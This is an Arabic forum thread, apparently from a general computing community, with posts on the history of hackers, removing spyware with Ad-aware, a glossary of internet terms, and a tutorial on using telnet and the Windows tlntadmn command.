الهاكرز, هذه الكلمة تخيف الكثير من الناس خصوصا مرتادي شبكة الإنترنت الذين يحملون خصوصياتهم الموجودة في أجهزتهم و يبحرون في هذا البحر, و معظم الأحيان يرجعون و قد تلصص أحدهم على هذه الخصوصيات و ربما استخدمها في أمور غير شرعية.

>عالم الهاكرز عالم ضخم غامض, و بدايته كانت قبل الإنترنت بل و قبل الكمبيوتر نفسه, و لربما تسائل البعض, من هو الهاكر؟

>تعريف الهاكرز:- الهاكرز, هذا اللفظ المظلوم عربيا, يطلق على المتحمسين في عالم الحاسب و لغات البرمجة وأنظمة التشغيل الجديدة, و يستخدم هذا اللفظ ليصف المبرمجين الذين يعملون دون تدريب مسبق.

>لقد انتشر هذا المصطلح انتشارا رهيباُ في الآونة الأخيرة و أصبح يشير بصفة أساسية إلى الأفراد الذين يلجئون بطريقة غير شرعية إلى اختراق أنظمة الحاسب بهدف سرقة أو تخريب أو إفساد البيانات الموجودة بها. و في حالة قيام المخترق بتخريب أو حذف أي من البيانات الموجودة يسمى ( كراكر), لأن الهاكر يقوم عادة بسرقة ما خف من البرامج و الملفات ولا يقوم بتخريب أو تدمير أجهزة الغير.

>بدايتهم :- نعود إلى عام 1878م, في الولايات المتحدة الأمريكية, كان أغلب العاملين في شركات الهاتف المحلية من الشباب المتحمس لمعرفة المزيد عن هذه التقنية الجديدة و التي حولت و غيرت مجرى التاريخ. فقد كانوا يستمعون إلى المكالمات الشخصية و يغيرون الخطوط الهاتفية بغرض التسلية و تعلم المزيد حتى قامت الشركات بتغيير الكوادر العاملة بها من الرجال إلى كوادر نسائية للانتهاء من هذه المشكلة.

>مع ظهور الكمبيوتر في الستينات من هذا القرن, انكّب المتحمسون على هذا الصندوق العجيب, و ظهر الهاكرز بشكل ملحوظ, فالهاكر في تلك الفترة هو المبرمج الذكي الذي يقوم بتصميم و تعديل أسرع و أقوى البرامج, و يعتبر كل من ( دينيس ريتشي و كين تومسون) أشهر هاكرز على الإطلاق في تلك الفترة لانهم صمموا نظام التشغيل ( اليونكس) و الذي كان يعتبر الأسرع في عام 1969م.

>و مع ظهور الإنترنت و انتشاره دولياً, أنتجت شركة Ibm عام 1981م جهاز أسمته ( الكمبيوتر الشخصي) الذي يتميز بصغر حجمه و وزنه الخفيف بالمقارنة مع الكمبيوترات القديمة الضخمة, و أيضا سهولة استخدامه و نقله إلى أي مكان و في أي وقت, و استطاعته الاتصال بالإنترنت في أي وقت. عندها, بدأ الهاكرز عملهم الحقيقي بتعلم كيفية عمل هذه الأجهزة و كيفية برمجة أنظمة التشغيل فيها و كيفية تخريبها, ففي تلك الفترة ظهرت مجموعة منهم قامت بتخريب بعض أجهزة المؤسسات التجارية الموجودة في تلك الفترة. يوماً بعد يوم ظهرت جماعات كبيرة منافسة , تقوم بتخريب أجهزة الشركات و المؤسسات حتى بدأت هذه المجموعات الحرب فيما بينها في التسعينات من هذا القرن و انتهت بإلقاء القبض عليهم .

>و من عمليات الاختراق الملفتة للأنظار, قيام مجموعة من الهاكرز مؤخراً بالهجوم على موقع هيئة الكهرباء والمياه في دبي و مكتبة الشارقة العامة و ذلك بنشر كلمات غريبة في الصفحة الرئيسة للموقعين !

>كما قامت مجموعة أخرى من البرازيل باختراق 17 موقعاً من الولايات المتحدة الأمريكية إلى بيرو, و من أهمهم موقع (ناسا) تاركة رسالة تقول " لا نرى فارقاً كبيراً بين نظامكم الأمني و نظام حكومة البرازيل"

انت جامد اوى على الشبكات

الله الله عليك يا باشا فعلا الموضوع 100%
ومقالة شاملة ووافية وجامدة جدا
وشكرا من صميم قلبي على المقالة

الف شكر اخى الكريم

الف شكر لكم يا شباب

بسم الله الرحمن الرحيم


--------------------------------------------------------------------------------

كثيرا ما تفاجأ أثناء الإبحار على الإنترنت بأشياء تحرمك من الحرية الشخصية ، لأن المواقع التي تزورها تقوم بزرع ملفات تجسس في جهازك· وفي بعض الأحيان، تجد نفسك أسيرا لصفحة أو موقع يظهر أمامك على الشاشة من دون إذن منك، فماذا تفعل؟
الحل هو تحميل برنامج يكشف ملفات التجسس ويعرضها أمامك ويطلب منك إزالتها، وهذا البرنامج هو Ad-aware وتقوم بإعداده بحيث يكشف ملفات التجسس·

التنزيل والتحول

توجد نسخة مجانية من Ad-aware الاصدار السادس، وتحصل عليها من الموقع

www.lavasoft.de

وبعد الانتهاء من تحميلها،

قم بفتح البرنامج من خلال Start Programs
Lavasoft Ad-aware 6 Ad-aware 6

الاستعمال

* الاعدادات: لجعل البرنامج يبحث عن ملفات التجسس في الحال، اضغط على الزر Setting الموجود في أعلى واجهة الاستخدام، لأن ذلك سيساعدك على اختيار المناطق التي تريد مسحها بدقة· اضغط على
Scanning وافحص كل الخيارات الإضافية الموجودة تحت Scan Settings كما في الشكل رقم 1 اضغط على Proceed لحفظ الاعدادات·


* ابدأ الفحص: اضغط على الزر Start ومن النافذة الجديدة تأكد من وجود علامة الصح بجوار الخيار Default وسيبدأ النظام بالبحث عن ملفات التجسس، وسيستغرق ذلك بعض الوقت، لانجاز كافة العمليات، ولكن المهم في الأمر ألا تقوم بأي عمل على الكمبيوتر أثناء الفحص·


* نتائج الفحص: عند انتهاء الفحص، ستجد ملخصا بالنتائج، كما في الشكل رقم 2 فاضغط على الزر Next لتعرف ما هي ملفات التجسس التي اكتشفت على الكمبيوتر، فالبرنامج يقوم بوضع تفاصيل كل الملفات بما فيها أسماؤها وأماكنها الحقيقية على الهارد درايف·


* إزالة الملفات: ضع علامة الصح بجوار الملفات التي تريد إزالتها ثم اضغط على الزر، فما اخترته لن يتم حذفه بشكل دائم، بل سيوضع في الحجر الصحي Quarantine وبهذه الطريقة تضمن بأن ما تريد إلغاءه من هذه الملفات لن يؤثر على النظام، علما بأنك ستكون قادرا على إلغاء هذه الملفات بشكل دائم، لاحقا·

* الحجر الصحي Quarantine: الخطوة التالية هي إطلاق البرنامج الذي قمت بحجز ملفات منه في الحجر الصحي لمعرفة ما إذا كان لذلك تأثير سلبي على أدائه،فإذا كان كل شيء طبيعيا، استطعت فتح قائمة الحجر الصحي واختر الملفات التي تريد إلغاءها بالكامل واضغط على الزر Delete·

الف شكر يا باشا على المعلومات الوفيره دى و جزاك الله كل خير
بس عندى استفسار ضغير و عايزك تردلى عليه
عايزك تعرفنا ايه ملفات spywere و ملفات adwere و ملفات trojen و ايه الفرق بينهم
و ايه الضرر اللى ممكن يجيلى من ملفات الكوكيز
و شكــــــــــــــــــــرا

شكرا ليك يا اخى على الشرح الجميل لملفات التجسس
وشكرا لاهتمامك بالرد على جميع الاسئله

الف الف الف شكر على ردك

الف شكر اخى الكريم

بس يلريت تتكلم شويه عن موضوع telnet

بسم اللة الرحمن الرحيم

A)

Administrator - المدير

شخص يقوم بإعداد مصادر الشبكة وتسجيل المستخدمين وأرقامهم السرية وصيانة المصادر.

Agent - عميل

في نظام (العميل/الموفر) (Client/Server) ، ذلك الجزء من النظام الذي ينفذ عملية إعداد وتبادل المعلومات نيابة عن برنامج المضيف Host أو الموفر Server.

Alert - تحذير

تقرير عن وجود خطأ بشكل صندوق تحذير أو صوت يطلقه الكمبيوتر.

ASCII - قاعدة المعايير الأمريكية لتبادل المعلومات

American Standard Code for Information Interchange معيار لتحويل الأحرف إلى أرقام وتحتوي على سبعة جزيئات بقيمة ثنائية تتراوح بين الصفر و 127.

Anonymous - مجهول

يتم استخدامه كاسم مستخدم للدخول على بعض الكمبيوترات البعيدة.

Authentication - التوثيق

تعريف هوية شخص أو الإجراءات الخاصة بذلك.

B)

Band Width - عرض النطاق

هي كمية المعلومات التي يمكنك إرسالها على خط معين في وقت محدد. عرض النطاق يقاس بعدد النبضات في الثانية Bits per Second وتكتب (bps).

BBS - لوحة إعلانات النظام

كمبيوتر مزود ببرامج معينة يوفر رسائل إلكترونية وملفات إضافة للخدمات الأخرى.

Binary - ثنائي

وسيلة عد تستخدم الرقمين 0 و 1 ، وهي الوسيلة التي يعمل بها الكمبيوتر داخلياً، وتحتوي الملفات الثنائية على ثمان جزئيات تتراوح بين صفر و 255

Browser - متصفح

برنامج يستخدم للإبحار في الشبكة العنكبوتية WWW.

C)

Client - تابع

جهاز كمبيوتر يقوم بطلب الخدمة من جهاز كمبيوتر آخر، فعندما يطلب كمبيوتر اشتراك مع موفر خدمة ISP فإنه يعتبر تابع لموفر الخدمة (Client of ISP).

Compression - ضغط

خطوات ضغط المعلومات لتخزين الملف في مساحة أصغر.

Connection - ربط

وسيلة اتصال بين جهازي كمبيوتر.

Crack - تخريب

مصطلح يطلق على برنامج يقوم بفك شفرة أحد البرامج المشتركة وجعله مجاني.

Cracker - مخرب

شخص يحاول الدخول على نظام ما دون تصريح ويسبب له أضرار.

D)

Data - بيانات

معلومات وبشكل خاص المعلومات المستخدمة بواسطة البرامج، أصغر وحدة في المعلومة يمكن للكمبيوتر فهمها هي bit.

Default - بديل افتراضي

قيمة أو فعل أو ترتيب يقوم الكمبيوتر بافتراضه في حال عدم قيام المستخدم بإعطاء تعليمات صريحة بخلاف ذلك. هذا النظام يمنع البرنامج من التعطل أو الاصطدام في حال عدم إعطاء قيمة بواسطة المستخدم.

Device - جهاز

الأجزاء التي يتركب منها الكمبيوتر Hardware مثل الشاشة والطابعة وخلافه، هذه الأجزاء يمكن أن يطلق عليها أيضاً الأجزاء الخارجية Peripheral لأنها منفصلة بصورتها المادية عن الكمبيوتر ولكنها مربوطة به.

جزء من الكمبيوتر أو قطعة من الأجهزة الخارجية التي يمكنها نقل المعلومات.

أي قطع أو معدات يمكن ربطها بالشبكة مثل الكمبيوتر والطابعة وموفر الملفات وموفر الطابعة وخلافه.

Dial-up - اتصال

استخدام التليفون أو ISDN لربط الكمبيوتر باستخدام مودم بخدمة الانترنت. وهي عكس الاتباط المستمر Permenant Connection وهذا يعني أنه كي تحصل على الخدمة فإنه عليك أن تعمل مكالمة هاتفية.

Domain - حقل

هو ذلك الجزء من الـ DNS الذي يحدد مكان شبكة كمبيوترك وموقعها في العالم.

DNS - نظام أسماء الحقول

Domain Name System هو نظام لتحديد العناوين الشبكية IP Addresses المطابقة للكمبيوترات المسماة والحقول Domains.. الـ DNS يتكون من سلسلة من المعلومات تفصل بينها نقاط... خدمة أسماء الحقول Domain Name Service هي عبارة عن برنامج يقوم بتحويل أسماء الحقول Domain Names إلى عناوين شبكية IP Addresses.

E)

Electronic Mail البريد الالكتروني

يرمز له e-mail وهو نظام يمكن بموجبه لمستخدم الكمبيوتر تبادل الرسائل مع مستخدم آخر أو مجموعة مستخدمين بواسطة شبكة اتصال، ويحتاج البريد الالكتروني إلى برنامج بريد مثل: Outlook أو Eudora ليتمكن من الارسال.

Emotion- رموز المشاعر

رموز تستخدم للتعبير عن المشاعر على الانترنت مثل « ابتسامة :) ، غضب :( »

Encryption - التشفير

هو معالجة كتلة من المعلومات بهدف منع أي شخص من قراءة تلك المعلومة باستثناء الشخص المقصود إرسالها إليه، وهناك العديد من أنواع التشفير.

F)

FAQs - الأسئلة المتكررة

Frequently Asked Questions وثيقة على الانترنت الغرض منها فحص وتدقيق المعلومات التي يحتاج إليها الكثير من الأشخاص بصفة متكررة.

Firewall - جدار نار

نظام تأمين لتقييد عملية الدخول على الكمبيوترات الموجودة على شبكة محلية LAN من أي مكان في الخارج.

Flame - التطهير

ردة فعل غاضبة لرسالة تم نشرها على Usenet أو القوائم البريدية Mailing List أو لوحات النقاش Message Boards ، التطهير يحدث لعدة أسباب مثل تعميم رسالة على الانترنت أو طرح سؤال توجد إجابته في الـ FAQs، حرب التطهير قد تحدث عندما يرد شخص تعرض للتطهير على الرسالة أو الرسائل التي وصلته.

G)

Gateway - بوابة

مصطلح (بوابة Gateway) لم يعد يستخدم حالياً ، والبوابة هي أداة أو برنامج اتصال يقوم بتسيير المعلومات من شبكة إلى أخرى.

Gopher - خدمة جوفر

نظام طورته جامعة مينيسوتا الأمريكية بهدف تسهييل عملية استخدام الانترنت وهو يعتمد على عملية البحث من خلال القوائم لقراءة الوثائق ونقل الملفات. Gopher يمكنه الإشارة الى الملفات ومواقع Telnet ومراكز معلومات WAIS وغيرها.

H)

Hacker - متطفل

المتطفل هو الشخص الذي يشعر بالفخر لمعرفته بطرق العمل الداخلية للنظام أو الكمبيوتر أو الشبكات بحيث يسعى للدخول عليها دون تصريح.

Host - مضيف

غالباً ما يستخدم مصطلح ( مضيف Host) للكمبيوتر الذي يتيح للمستخدمين الدخول عليه.

HTTP - بروتوكول نقل النص التشعبي

HTTP هي وسيلة تجعل من الممكن التصفح عبر وثائق الشبكة العنكبوتية، المستخدم يضغط على نقاط ربط موجودة على وثيقة الشبكة العنكبوتية مما يمكنه من الذهاب إلى تلك الوثيقة حتى لو كانت موجودة على جهاز آخر.

I)

ISDN - الشبكة الرقمية للخدمات الموحدة

Intergrated Services Digital Network هي تكنولوجيا جديدة تحتوي على شبكات صوتية ورقمية في وسيلة واحدة وتعتبر خدمة اتصالات فائقة السرعة.

IP - بروتوكول الانترنت

Internet Protocol هو طبقة الشبكة الخاصة بحاشية بروتوكول TCP/IP والتي تستخدمها الأدوات على الانترنت للاتصال ببعضها. والـIP Address (عنوان بروتوكول الانترنت) هو العنوان الخاص بكل كمبيوتر متصل بشبكة ولكل عنوان الـIP طريقتين للكتابة اما رقمية (TCP/IP Address) مثل 212.26.66.3 أو حرفية (FQDN) وهي العناوين التي نكتبها عادة في المتصفحات مثل ftp.empac.co.uk والعنوان الحقيقي هو الرقمي ولكن لصعوبة حفظه فنكتب العنوان الحرفي ولكن في الشبكة داخلياً يتم ترجمة العنوان الحرفي الى العنوان الرقمي المطابق له.

ISP - مقدم خدمة الانترنت

Internet Service Provider هو الشركة التي يقوم المستخدم - عادة - بالاشتراك لديها للحصول على ربط بالانترنت، وهذه الشركة مرتبطة بالانترنت مباشرة من احدى الشركات الأعضاء في CIX.

J)

JPEG

وسيلة لضغط الصور المستخدمة في الانترنت

K)

Kilobit - كيلو بت

وحدة قياس تعادل 1024 ب, وتستخدم عادة في تحديد الطاقة الاستيعابية للذاكرة

Kilobyte - كيلو بايت

وحدة قياس تعادل 1024 بايت.

L)

Layer - طبقة

شبكات الكمبيوتر قد تنظم على شكل مجموعة أعداد أكثر أو أقل من البروتوكولات المستقلة كل منها في طبقة Layer وقد تسمى مستوى Level.

Login - تسجيل

أي أن تقوم بتسجيل اسمك كمستخدم لنظام أو شبكة فيصبح لديك اسم مستخدم Login Name.

Log off - انهاء عملية التسجيل

هو اخبار النظام بانك أنهيت عملك وستقطع الارتباط.

Lurking - التواري

يستخدم هذا المصطلح للتعبير عن شخص ليس لديه مشاركة نشطة في مجموعة الاخبار او لوحة النقاش أو قائمة البريد التي اشترك معها، ويفضل التواري للأشخاص المبتدئين الذين يريدون التأقلم في البداية مع الآخرينز

M)

Mailing List - قائمة بريد

قائمة بعناوين الكترونية لعدة أشخاص. كل شخص مشترك في هذه القائمة يرسل موضوعاً يخص اهتمامات هذه القائمة الى كمبيوتر رئيسي يقوم بتحويل هذه الرسالة الى جميع المشتركين في القائمة البريدية، هناك قوائم معدلة Moderated وتعني أن الرسالة ترسل في البداية الى صاحب هذ ه القائمة ليدقق فيها واذا تأكد من صلاحيتها يقوم بارساله للبقية وهناك قوائم غير معدلة Unmoderated وتقوم بارسال الرسالة أتوماتيكياً للمشتركين.

Megabyte - ميجا بايت

وحدة قياس تعادل 1024 كيلو بايت أو 1048576 بايت.

MIME - توصيلة بريد الانترنت المتعددة الأغراض

Multipurpose Internet Mail Extension نظام لتوفير القدرة على نقل البيانات غير النصية كالصور والصوت والفاكس من خلال البريد الالكتروني.

N)

Netiquette - آداب الشبكات

الالتزام بقواعد سلوك ملائمة عند استخدام الشبكة

NETBIOS - نظام شبكة المدخلات والمخرجات الأساسي

Network Basic Input/Output System يسمح للأجهزة التي تعمل بنظام DOS من التحدث مع واستعمال خدمات الشبكة. نفس الاسم هو اسم بروتوكول شبكة محلية يستخدم بشكل واسع في منتجات ميكروسوفت.

Newsgroup - مجموعة أخبار

مجموعات الأخبار التي قد يصل عددها الى 16.000 مجموعة تكون معاً الـUsenet، وهي بمثابة الصحف التي تناقش جميع موضوعات الحياة وأي موضوع قد يخطر ببالك، ومعظم موفري الخدمة يوجد لديهم موفر مجموعات أخبار Newsgroup Server.

O)

On-Line/Off-Line - متصل/غير متصل

On-Line تعني أن الكمبيوتر متصل حالياً بالشبكة وعكسه Off-Line أي غير متصل.

P)

PING - مجمع كتلة الانترنت

Packet InterNet Grouper برنامج يستخدم لاختبار القدرة الوصولية وذلك بارسال طلب صدى ICMP اليها وانظار الرد

PPP - بروتوكول نقطة الى نقطة

Point-to-Point Protocol إحدى وسيلتين لتبادل كتل البيانات عبر انترنت بواسطة خطوط الهاتف ( الوسيلة الأخرى هي SLIP) بروتوكول PPP يوفر وسيلة ضغط للبيانات وتصحيح الأخطاء ولايزال تحت التطوير.

POP - بروتوكول مكتب البريد

Post Office Protocol يسمح للمستخدم بتخزين رسائله في كمبيوتر شركة توفير الخدمة كي يقوم باسترجاعها فيما بعد، وهناك ثلاث طبعات لهذا النظام POP و POP2 و POP3.

Port - ميناء (منفذ)

تحديد موقع برنامج معين على كمبيوتر مضيف على الانترنت.. قبل سنوات قليلة كان على المستخدم تحديد البورت بنفسه؛ المنفذ 23 خاص بالـTelnet والمنفذ 21 خاص بالـFTP، أما اليوم فمعظم البرامج تحدد المنفذ اتوماتيكياً.

Proxy - تفويض

طريقة يقوم بمقتضاها جهاز - موجه غالباً - بالرد على طلبات للدخول على مواقع معينة وبذلك يقوم بتنفيذ هذا الطلب بناء على الأوامر التي تلقاها وعلى التوجيه الذي صُمِمَ عليه.

Q)

Queue - صف

كتل احتياطية تنتظر المعالجة

R)

RAM - ذاكرة الدخول العشوائي

Random - Access Memory الجزء من ذاكرة الكمبيوتر الذي يقوم بتخزين المعلومات بصفة مؤقتة بينما هي تحت الاستخدام . أغلب الكمبيوترات تحتوي على 512 KB من ذاكرة الرام، هذه المعلومات اذا أغلقت الجهاز ولم تحفظها تختفي الى الأبد.

Remote - بعيد

لايمكن ربطه مباشرة باستخدام أسلاك محلية ولكنه يحتاج الى أدوات اتصال.

Router - موجه

نظام كمبيوتر يتخذ القرارات الخاصة بتحديد اتجاهات الحركة على الانترنت.

S)

SLIP - بروتوكول الانترنت ذو الخط المتسلسل

Serial Line Internet Protocol هو بروتوكول يستخدم لتشغيل بروتوكول الانترنت IP على خطوط متسلسلة Serial Lines كدوائر الهاتف. عادة عند الارتباط بموفر خدمة يستخدم اما PPP أو SLIP.

Server - خادم (موفر)

جهاز يفتح للمستخدمين لتوفير الخدمات لهم كنقل الملفات وغيرها.. الشخص الذي يدخل على الـServer يسمى Client

Shell - المحارة

برنامج يوفر للمستخدم القدرة على التفاعل مع الكمبيوتر.

SMTP - بروتوكول نقل البريد البسيط

بروتوكول يستخدم لنقل البريد الالكتروني بين الأجهزة.

Spamming - التعميم

مصطلح يطلق على عملية تعميم رسالة في مجموعات الأخبار أو البريد الالكتروني. ويقابله التطهير Flaming.

Standard - معيار (افتراضي)

مجموعة من المواصفات لتصميم البرامج يتم الاعتراف بها من قبل بائعين أو منظمة رسمية.

T)

T1

مصطلح AT&T يعبر عن وسائل النقل الرقمية Digital التي تستخدم لنقل DS-1 الاشارات الرقمية المشكلة وذلك بسرعة 1.5 MB في الثانية (سرعة خارقة) وذلك باستخدام خط مؤجر Leased Line وهناك أيضاً T3 التي تستخدم لنقل DS-3 بسرعة 44.746 MB في الثانية.

TCP - بروتوكول التحكم بالنقل

يقوم هذا البروتوكول بتمرير المعلومات الى بروتوكول الانترنت IP وهو مسئول عن التأكد من وصول الرسالة وأنها مفهومة.

Telenet - الاتصال عن بعد

Telnet هي بروتوكول انترنت معياري لخدمات الربط عن بعد ويسمح للمستخدم بربط جهازه على كمبيوتر مضيف جاعلاً جهازه وكأنه جزء من ذلك الكمبيوتر البعيد.

Trojan Horse - حصان طروادة

برنامج كمبيوتر يحمل داخله وسائل تسمح لمكونه الدخول الى النظام الذي زُرِعَ فيه.

URL - معين المصادر المنتظم

Uniform Resourse Locator وسيلة معيارية للإشارة للمصادر تقوم بتحديد نوع الخدمة بالاضافة الى موقع الملف أو الدليل.

Unix - نظام يونيكس

نظام تشغيل تستخدمه معظم شركات توفير الخدمة ويقوم بربط عدة أجهزة تابعة Clients به للدخول عليه.

Usenet - شبكة المستخدم

شبكة من مجموعات الأخبار تتكون من 16.000 مجموعة أخبار تهتم بجميع شؤون الحياة.

V)

Virus - فيروس

برنامج يكرر ويضاعف نفسه عن طريق دمج نفسه بالبرامج الأخرى ويضر الكمبيوتر كثيراً.

W)

White Pages - الصفحات البيضاء

مراكز معلومات توفر خدمات ومعلومات عن أشخاص معينين.

Whois

برنامج يتيح لمستخدمه البحث في مراكز المعلومات عن أشخاص وعناوين.

WAIS

نظام يتيح لمستخدمه البحث عن موضوع معين باستخدام كلمات مفتاحية Keywords.

Winsock

نظام التقاء في ويندوز، واذا أردت الدخول على الانترنت فيجب أن يتوفر لديك ملف يدعى winsock.dll موضوع داخل النظام. المشكلة التي تتكرر كثيراً هي أنه ليس جميع البرامج تعمل مع نفس طبعة winsock تطبيق trumpet الذي يستعمله الكثيرون يستخدم لتوفير ربط SLIP بين حاسباتهموتقوم الانترنت بتوفير نسخة من winsock.

WWW - الشبكة العنكبوتية العالمية

برنامج يعمل باستخدام نقاط ربط Hybertext link كي يتمكن المستخدم من التصفح بواسطة النقر على الروابط.

Worm - دودة

برنامج يكرر نفسه ولكنه يتكاثر في الشبكة بشكل مقصود بعكس الفيروسات، دود الانترنت الذي حدث عام 1988 ربما يكون الأشهر فقد استطاع الدود أن يتكاثر في أكثر من 6000 نظام.

WYSIWYG - ماتراه هو ماتحصل عليه

What You See Is What You Get هومصطلح يطلق على بعض برامج تصميم صفحات الويب التي تتيح رؤية ماستكون الصفحة عليه من خلال البرنامج نفسه وهو يطلق على البرامج التي تكتب لغة الهتمل في الخلفية نيابة عنك.

X)

X - Modem

بروتوكول يستخدم لنقل الملفات بين حاسبين عادة بواسطة مودم.

Y)

Yellow Pages - الصفحات الصفراء

خدمة تستخدم بواسطة اداريي UNIX بغرض ادارة مراكز المعلومات الموزعة عبر الشبكة.

Y - Modem

بروتوكول يستخدم لنقل الملفات بين حاسبين عادة بواسطة مودم.

Z)

Z - Modem

بروتوكول يستخدم لنقل الملفات بين حاسبين عادة بواسطة مودم.

Zone - نطاق

مجموعة من أدوات الشبكة Apple Talk
:bye10000: :bye10000: :bye10000:

تعرف على برنامج تل نت telnet

عالم الانترنيت عالم فسيح واسع, و ليس الانترنيت هو كل ما نراه او نتعامل معه عن طريق برنامج التصفح الشهير من ميكروسوفت internet explorer بل إن هناك العديد من المتصفحات و العديد من المحتويات و البرامج التي تستخدم في تصفح الشبكة العنكبوتية العالمية غير أن الانتشار الواسع لبرنامج المتصفح internet explorer جعل معظم رواد هذه الشبكة يستعملونه فقط,كما إن سهولة التعامل معه, و بساطة أوامره, جعلت منه برنامج الانترنيت الأكثر شهرة على صعيد الاستخدام.
في هذا المقالة نستعرض سويا احد البرامج القوية في تصفح و نتداول المعلومات, و التي تعرف بي telnet.

أثناء الإبحار في آفاق الويب بحثا عن معلومة أو مواقع جديدة و مثيره, تستخدم محركات البحث المعروفة,لكن إن كنت تقصد المكتبات أو كنت من هواة المطالعة, فانك ستفاجأ عند محاولة الدخول برسالة مفادها لا يمكنك الولوجaccess is denial فلا تعتقد أن هناك خطأ ما , الموضوع ببساطة أن المستعرضات المعروفة لا يمكنها الدخول إلى مثل هذه الخدمات , بل يتطلب الأمر خدمة مقالنا هذا telnet فهي توفر خدمة متميزة و كمية ضخمة من المعلومات لا يمكن الوصول إليها من دونها .
اذا ما هي telnet؟
هي خدمة من خدمات الانترنيت الرئيسة التي تمكن المستخدم من الولوج إلى أجهزة كومبيوتر بعيدة تسمى الأجهزة المضيفة,كما تمكن المستخدم من تنفيذ البرامج على أجهزة كبيرة تسمى الأجهزة فوق المتوسطة mainframes وتعد جزء من بروتوكول مجموعة TCP/IP و بتعبير آخر تعد هذه الخدمة شكلا من أشكال الاتصالات يتم فيها تبادل المعلومات بين جهازين الخادم و المستفيد client/ server و يكون الجهاز الزائر عبارة عن طرفية terminal متصل بالخادم Server الذي يقدم الخدمة أي أن الجهاز الضيف يتحول إلى جهاز إدخال / إخراج input/ output
بينما يقوم الجهاز المستضيف بانجاز جميع العمليات الواردة إليه.
تعتمد telnetعلى سطر الأوامر خلافا للخدمة التي يوفرها المستعرض اشر و انقر point- and click أي ان البرنامج يتطلب معرفة دقيقة لأوامر .
و توجد مواقع لخدمة telnet نذكر منها قواعد البيانات الرسمية official database و التقارير التقنية technical report و فهارس الكتب بما في ذلك مكتبة الكونغرس الأمريكية بالإضافة إلى مواقع وكالة الفضاء الأمريكية ناسا وتقارير علم الفضاء و الجدير ان بعض المواقع تتطلب اسم مستخدم كلمة مرور و بعضها لا.
مبدأ عمل telnet
الرسم المرفق يوضح كيفية عمل برنامج telnet

ستحدث سلسلة من العمليات في الزمن الحقيقي بعد قيام الاتصال وفقا للترتيب التالي:
1. يعمل الجهاز المستفيد كما لو انه طرفية إدخال و إخراج فقط و سيتم ترجمة الأوامر التي يدخلها المستخدم إلى صيغة معيارية تتناسب مع نظام التشغيل الذي يستخدمه الجهاز المستفيد.
2. يترجم برنامج telnet client الصيغة السابقة الى الصيغة الطرفية الوهمية Network Virtual terminal N V Tثم ترسل البيانات عن طريق بروتوكول TCP/IP
3. يسفر برنامج telnet server الأوامر التي وصلته بصيغة NVT إلى صيغة تناسب نظام تشغيل الخادم و يعالجها ثم يرسل المعلومات إلى الجهاز المستفيد.
4. يتلقى برنامج telnet client المعلومات و يعرضها على شاشة المستفيد.

التعامل مع البريد عن طريق برنامج telnet
من start ثم run ثم اكتب :
Telnet pop.mail.yahoo.com 110
بافتراض أن لديك حساب في الياهو ستظهر لك نافذة مثل الدوس اكتب اسم المستخدم و كلمة المرور اذا كان ادخالك صحيح ستظهر لك ok
لمشاهدة جميع الرسائل و أحجامها اكتب list ثم اضغط enter لحدف أي رسالة اكتب dele ثم حدد رقم الرسالة .
 بعض الأوامر المستخدمة مع التلنت
وصل عميل التلنت مع جهاز بعيد
بناء الجملة
open [\\RemoteServer] [Port]
المعلمات
\\RemoteServer
تحديد اسم الملقم الذي تريد إدارته. إن لم تحدد ملقماً ما، سيتم افتراض الملقم المحلي.
Port
تحديد المنفذ الذي تريد استخدامه. إن لم تحدد منفذاً ما، سيتم افتراض المنفذ الافتراضي.
ملاحظات
• يمكنك اختصار هذا الأمر إلى o.
أمثلة
للاتصال بملقم بعيد Redmond من خلال رقم المنفذ 44، اكتب:
o redmond 44

لقطع تصال عميل Telnet من كمبيوتر بعيد
بناء الجملة
close [\\RemoteServer]
المعلمات
\\RemoteServer
تحديد اسم الملقم الذي تريد إدارته. إن لم تحدد ملقماً ما، سيتم افتراض الملقم المحلي.
ملاحظات
• يمكنك اختصار هذا الأمر إلى c.
أمثلة
لقطع الاتصال من ملقم بعيد Redmond، اكتب:
c redmond 44
لإرسال أوامر عميل Telnet
بناء الجملة
send [\\RemoteServer] [ao] [ayt] [esc] [ip] [synch] [?]
المعلمات
\\RemoteServer
تحديد اسم الملقم الذي تريد إدارته. إن لم تحدد ملقماً ما، سيتم افتراض الملقم المحلي.
ao
إحباط أمر الإخراج.
ayt
إرسال أمر "Are you there?".
esc
إرسال حرف الهروب الحالي.
ip
مقاطعة أمر العملية.
synch
أداء عملية تزامن Telnet.
لعرض الإعدادات الحالية لعميل Telnet
بناء الجملة
display
المعلمات
بلا
ملاحظات
• يسرد الأمر display معلمات التشغيل الحالية لعميل Telnet. إذا كنت في جلسة عمل Telnet (بعبارة أخرى، إذا كنت متصلاً بملقم Telnet)، يمكنك الخروج من جلسة عمل Telnet لتعديل المعلمات بضغط CTRL+]. للعودة إلى جلسة عمل Telnet، اضغط ENTER.
 إدارة ملقم التلنت المحلي بالـ tlntadmn
لإدارة كمبيوتر يشغل ملقم Telnet
بناء الجملة
tlntadmn [\\RemoteServer] [start] [stop] [pause] [continue]
المعلمات
\\RemoteServer
تحديد اسم الملقم الذي تريد إدارته. إن لم تحدد ملقماً ما، سيتم افتراض الملقم المحلي.
start
بدء تشغيل ملقم Telnet.
stop
إيقاف تشغيل ملقم Telnet.
pause
مقاطعة ملقم Telnet.
continue
استئناف ملقم Telnet.
ملاحظات
• يمكنك إدارة كمبيوتر عن بعد يشغل ملقم Telnet باستخدام الأوامر tlntadmn إذا كان كلاً من جهازي الكمبيوتر يشغلان نفس نظام التشغيل فإذا المطلوب ويندوز2000 استخدمه بي ويندوز 2000. لا يمكنك استخدام الأوامر tlntadmn لإدارة كمبيوتر عن بعد يشغل Windows 2000 وملقم Telnet من كمبيوتر يشغل Windows XP مثلاً.

لتعيين الحد الأقصى لعدد الاتصالات على كمبيوتر يشغل ملقم Telnet
بناء الجملة
tlntadmn [\\RemoteServer] config [maxconn=PositiveInteger]
المعلمات
\\RemoteServer
تحديد اسم الملقم الذي تريد إدارته. إن لم تحدد ملقماً ما، سيتم افتراض الملقم المحلي.
maxconn=PositiveInteger
تعيين العدد الأعظمي للاتصالات. يجب عليك تحديد هذا العدد بواسطة عدد صحيح موجب أصغر من 10 ملايين.
لتعيين العدد الأعظم لمحاولات تسجيل الدخول الفاشلة على كمبيوتر يشغل ملقم Telnet
بناء الجملة
tlntadmn [\\RemoteServer] config [maxfail=PositiveInteger]
المعلمات
\\RemoteServer
تحديد اسم الملقم الذي تريد إدارته. إن لم تحدد ملقماً ما، سيتم افتراض الملقم المحلي.
maxfail=PositiveInteger
